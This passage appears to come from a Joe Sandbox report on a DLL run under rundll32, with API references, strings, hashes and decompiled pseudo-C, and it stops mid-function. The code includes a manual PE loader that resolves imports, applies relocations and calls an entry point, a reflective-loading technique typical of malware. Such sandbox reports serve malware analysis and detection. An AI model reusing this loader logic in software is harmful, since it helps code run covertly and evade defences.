0x1000f298
0x1000f29d
0x1000f29f
0x1000f29f
0x1000f2a2
0x1000f2a6
0x1000f2ab
0x1000f2ad
0x1000f2ad
0x1000f2bc
0x1000f2c4
0x1000f2ca
0x1000f2cd
0x1000f2d1
0x1000f2d3
0x1000f2d6
0x1000f2d8
0x1000f2db
0x1000f2db
0x1000f2e0
0x1000f2e2
0x1000f2ef
0x1000f2f3
0x1000f2f5
0x1000f2f7
0x1000f2f7
0x1000f2fc
0x1000f300
0x1000f33c
0x1000f342
0x1000f34b
0x1000f302
0x1000f307
0x1000f310
0x1000f315
0x1000f320
0x1000f326
0x1000f32d
0x1000f334
0x1000f339
0x1000f34e
0x1000f352
0x1000f357
0x1000f357
0x1000f35c
0x1000f360
0x1000f3a9
0x1000f3ab
0x1000f3ae
0x1000f3b6
0x1000f3ba
0x1000f3bd
0x1000f3cf
0x1000f3da
0x1000f3dc
0x1000f3f1
0x1000f3f3
0x1000f3f9
0x1000f42e
0x1000f433
0x1000f438
0x1000f43a
0x00000000
0x1000f43a
0x1000f3fb
0x1000f3fd
0x1000f3fd
0x1000f406
0x1000f409
0x1000f409
0x1000f40b
0x1000f40d
0x1000f413
0x1000f413
0x1000f416
0x1000f418
0x1000f41a
0x1000f421
0x1000f421
0x00000000
0x1000f424
0x1000f3de
0x1000f3e6
0x00000000
0x1000f362
0x1000f362
0x1000f368
0x1000f36e
0x1000f371
0x1000f371
0x00000000
0x1000f371
0x1000f2e4
0x1000f2e4
0x1000f373
0x1000f373
0x1000f379
0x1000f37c
0x1000f37c
0x00000000
0x1000f37c
0x1000f289
0x1000f289
0x1000f37e
0x1000f37e
0x1000f384
0x1000f387
0x1000f387
0x00000000
0x1000f387
0x1000f287
0x1000f248
0x1000f389
0x1000f38c
0x1000f38e
0x1000f391
0x1000f394
0x1000f394
0x1000f39d
0x1000f3a0
0x1000f3a2
0x00000000
0x00000000
0x1000f3a6
0x00000000
0x1000f3a6
0x1000f217
0x00000000

APIs

memset.MSVCRT ref: 1000F154
memset.MSVCRT ref: 1000F165

Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000F248

Strings

POST, xrefs: 1000F2A6
GET, xrefs: 1000F2AD, 1000F2C3

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: memset$ErrorLast
String ID: GET$POST
API String ID: 2570506013-3192705859
Opcode ID: 3fe8ed42323438c95cbd423daaf787408dc2ec82612b357b8314e3646d689d1a
Instruction ID: c87b9fb0a9fafe7a4f3f35a8b55887b992dd21be3c4982e5565fa784aea7ae63
Opcode Fuzzy Hash: 3fe8ed42323438c95cbd423daaf787408dc2ec82612b357b8314e3646d689d1a
Instruction Fuzzy Hash: B8A19EB5900219AFEB50DFA4CC84AEEB7F9EF48350F208029F505E7695DB749A41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10011DCD Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10011E4D
qsort.MSVCRT ref: 100120CB

Strings

%I64d, xrefs: 10011E3F
true, xrefs: 10011E24
null, xrefs: 10011E12
false, xrefs: 10011E30

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 47a3a100da203642488b1b01a907a1b11e44da986f7d1736df3d4d16a275fc55
Instruction ID: 99e7c3b995d16f303a99f6db7a251a1efad8bffc3f45fe7ed278e0bcb9f1f9da
Opcode Fuzzy Hash: 47a3a100da203642488b1b01a907a1b11e44da986f7d1736df3d4d16a275fc55
Instruction Fuzzy Hash: 54E15BB190024ABBDF15DFA4DC42EEF3BA9EF45384F108019FE149A141E735DAE19BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001472A Relevance: 9.3, APIs: 6, Instructions: 329
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E1001472A(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t220;
				signed int _t237;
				void* _t277;
				signed int _t282;
				signed int _t284;
				intOrPtr _t324;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t324 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t324;
				if(_t324 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							E100144D8(GetCurrentProcess(),  *0x10020fe4, _t203, _a4, _a4);
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t220 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t220 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t237 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t237 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t277 = 0xfffffffd;
							return _t277;
						}
					}
					goto L35;
				}
				_t282 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t282 * 5));
				_t284 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t284 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}

0x10014733
0x10014740
0x10014746
0x1001474f
0x10014752
0x10014755
0x00000000
0x10014846
0x1001484a
0x1001484c
0x1001485a
0x10014978
0x1001497c
0x10014a44
0x10014a4d
0x10014a50
0x10014a54
0x10014a5a
0x10014a62
0x10014a62
0x10014a6a
0x10014a80
0x10014a93
0x10014a96
0x10014a9a
0x10014aa0
0x10014ab0
0x10014adb
0x00000000
0x10014add
0x10014ab6
0x10014ac7
0x00000000
0x10014ad5
0x10014ad9
0x00000000
0x10014ad5
0x10014ac9
0x10014acd
0x10014ad2
0x00000000
0x10014ad2
0x10014ab8
0x10014abc
0x10014abe
0x00000000
0x10014abe
0x10014aa2
0x10014aa6
0x00000000
0x10014aa8
0x10014982
0x10014986
0x10014988
0x10014996
0x00000000
0x00000000
0x1001499c
0x100149a5
0x100149b3
0x100149bf
0x100149cb
0x100149d4
0x100149d7
0x100149db
0x100149dd
0x100149ea
0x100149fe
0x10014a0d
0x10014a1e
0x100149e7
0x00000000
0x100149e7
0x10014a20
0x10014a24
0x10014a29
0x00000000
0x10014a29
0x10014a34
0x00000000
0x00000000
0x10014a36
0x10014a3a
0x00000000
0x10014a3c
0x10014860
0x10014869
0x10014877
0x1001487a
0x10014897
0x1001489e
0x100148b0
0x100148b0
0x100148b7
0x100148c7
0x100148df
0x100148c9
0x100148d1
0x100148d1
0x100148e2
0x100148e6
0x100148f6
0x10014919
0x1001492b
0x100148f8
0x1001490c
0x1001490c
0x10014935
0x10014951
0x10014937
0x10014946
0x10014946
0x10014959
0x10014962
0x10014962
0x10014970
0x00000000
0x100148b9
0x100148bb
0x00000000
0x100148bb
0x100148b7
0x00000000
0x1001487a
0x1001475d
0x1001476b
0x10014770
0x1001477b
0x1001477e
0x10014782
0x10014784
0x10014794
0x1001479d
0x100147a6
0x100147ae
0x100147b7
0x100147c2
0x100147c8
0x100147cb
0x100147ce
0x100147d5
0x100147dc
0x00000000
0x00000000
0x100147e7
0x100147f5
0x10014800
0x1001480a
0x10014822
0x1001482f
0x1001482f
0x1001480c
0x10014817
0x10014817
0x10014836
0x10014836
0x1001483e
0x1001483e
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 10014891
LoadLibraryA.KERNEL32(00000000), ref: 100148AA
GetProcAddress.KERNEL32(00000000,?), ref: 10014906
GetProcAddress.KERNEL32(00000000,?), ref: 10014925
lstrcmpA.KERNEL32(?,00000000), ref: 10014A16
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 10014A73

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$CurrentHandleLibraryLoadModuleProcesslstrcmp
String ID:
API String ID: 2598995400-0
Opcode ID: 2177c1f24ff3cde81dc3cba8acccce6a4d6644a7936ee6e42606d82185f5fa6b
Instruction ID: 8ce2545dcfdf1b075962a8eadafe5cd5c258ebc8f2810bbd0a540e449d7a2533
Opcode Fuzzy Hash: 2177c1f24ff3cde81dc3cba8acccce6a4d6644a7936ee6e42606d82185f5fa6b
Instruction Fuzzy Hash: 8CE1A074E00209DFDB50CFA8C880AADBBF1FF08354F628569E815AB361DB34E991CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1000D3D7 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D3EB
SysAllocString.OLEAUT32(?), ref: 1000D3F3
SysAllocString.OLEAUT32(00000000), ref: 1000D407
SysFreeString.OLEAUT32(?), ref: 1000D482
SysFreeString.OLEAUT32(?), ref: 1000D485
SysFreeString.OLEAUT32(?), ref: 1000D48A

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0d28ba521176732a0c5d5810ff6faa4146b34a4da917b14d726958c1f513da72
Instruction ID: 961eb39602c70f2a203f5431f7acb9ec6646a0a5302c4a3dd4ac3c3d43dc5e55
Opcode Fuzzy Hash: 0d28ba521176732a0c5d5810ff6faa4146b34a4da917b14d726958c1f513da72
Instruction Fuzzy Hash: 6E212CB5A00219BFDB00DFA4CC88C9FBBBDEF49294B10449AF505E7250D771AE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10012312 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 1001246B
@, xrefs: 10012380
\u%04X, xrefs: 1001242C

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 493483fb906f91a0434a20b66ccdc4e1535a435bead09ed2833b61867c36d1d8
Instruction ID: eb18ba607d7dd9a04e403e711ed86a94d3658e1d124d9acdc96c7653c83a5569
Opcode Fuzzy Hash: 493483fb906f91a0434a20b66ccdc4e1535a435bead09ed2833b61867c36d1d8
Instruction Fuzzy Hash: 3641F8F1A00146BBDF24CEA89C95ABF3BD5EF0A258F200525FD16DE240D679CEF09291

Uniqueness

Uniqueness Score: -1.00%

Function 10013CE2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10013CE2(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L10013E3B();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E10013CBB(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E100092EF(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x100124cd
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}

0x10013ce2
0x10013ce5
0x10013cea
0x10013cee
0x10013cee
0x10013cf4
0x10013cf8
0x10013cf9
0x10013cfc
0x10013cfd
0x10013d02
0x10013d05
0x10013d06
0x10013d0b
0x10013d12
0x10013d9b
0x10013d9b
0x00000000
0x10013d1d
0x10013d1e
0x10013d30
0x10013d56
0x10013d56
0x10013d5f
0x10013d61
0x10013d67
0x10013d96
0x10013d96
0x10013d9e
0x10013da1
0x10013da1
0x10013d69
0x10013d6a
0x10013d70
0x10013d72
0x10013d72
0x10013d77
0x10013d76
0x10013d76
0x10013d7e
0x10013d8a
0x10013d94
0x10013d94
0x00000000
0x10013d40
0x10013d40
0x10013d40
0x10013d46
0x00000000
0x00000000
0x10013d48
0x10013d4e
0x10013d53
0x00000000
0x10013d53
0x10013d30

APIs

_snprintf.MSVCRT ref: 10013D06
strchr.MSVCRT ref: 10013D26
strchr.MSVCRT ref: 10013D35
strchr.MSVCRT ref: 10013D5A

Strings

%.*g, xrefs: 10013CFD

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: strchr$_snprintf
String ID: %.*g
API String ID: 3619936089-952554281
Opcode ID: 286a288ee1548feab581ae243e4d75e912d28c7f784a30c9e4bd429eae58ea52
Instruction ID: a0cb154953dd0ca0f53bbf6e7323fc8ff70a8177b6082b7344b2c0a88ec657ea
Opcode Fuzzy Hash: 286a288ee1548feab581ae243e4d75e912d28c7f784a30c9e4bd429eae58ea52
Instruction Fuzzy Hash: 2221E436604B5626E721CA18FC8AF9E37D8DF012A8F16C125FD449E181E771EDC183D1

Uniqueness

Uniqueness Score: -1.00%

Function 10013E83 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E10013E83(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E100094A4(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x10013e83
0x10013e89
0x10013e91
0x10013ea6
0x10013eb8
0x10013ec4
0x10013eca
0x10013ecf
0x10013edb
0x10014046
0x00000000
0x10014046
0x10013ee1
0x10013eea
0x10013ef8
0x10013efb
0x10013f0a
0x10013f0a
0x10013f11
0x10013f1f
0x10013f22
0x10013f32
0x10013f3f
0x10013f46
0x10013f56
0x10013f68
0x10013f6e
0x10013f58
0x10013f60
0x10013f60
0x10013f71
0x10013f75
0x10013f81
0x10013f85
0x10013f89
0x10013f8d
0x10013f99
0x10013fc4
0x10013fcc
0x10013fd2
0x10013fde
0x10013fea
0x10013f9b
0x10013fa0
0x10013fab
0x10013fb7
0x10013fb7
0x10013ff3
0x10013ff9
0x10014003
0x1001401f
0x10014005
0x10014008
0x10014014
0x10014014
0x10014003
0x10014027
0x10014030
0x10014030
0x1001403e
0x00000000
0x1001403e
0x10013f4a
0x00000000
0x10013f4a
0x00000000
0x10013f22
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 10013EA0
LoadLibraryA.KERNEL32(00000000), ref: 10013F39

Strings

kernel32.dll, xrefs: 10013E9B
GetProcAddress, xrefs: 10013EA9

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 88c6ed96c91829df7c342a51efce9276512e3ecae6be753845a2ecd89279e371
Instruction ID: 3f5e57b1250461a42cf01aaecdc59c0111733b1b6bf08b31502ed366e43670da
Opcode Fuzzy Hash: 88c6ed96c91829df7c342a51efce9276512e3ecae6be753845a2ecd89279e371
Instruction Fuzzy Hash: 2B619C75D00209EFDB01CF98C885BADBBF1FF08355F2185A9E915AB2A1D774AA80DF50

Uniqueness

Uniqueness Score: -1.00%

Function 10014CE0 Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10014CE0(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x40f8458b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x20fd8a1
					_t12 = _t272 + 0x5c; // 0x38e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10017D00(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10016A60(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x38e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
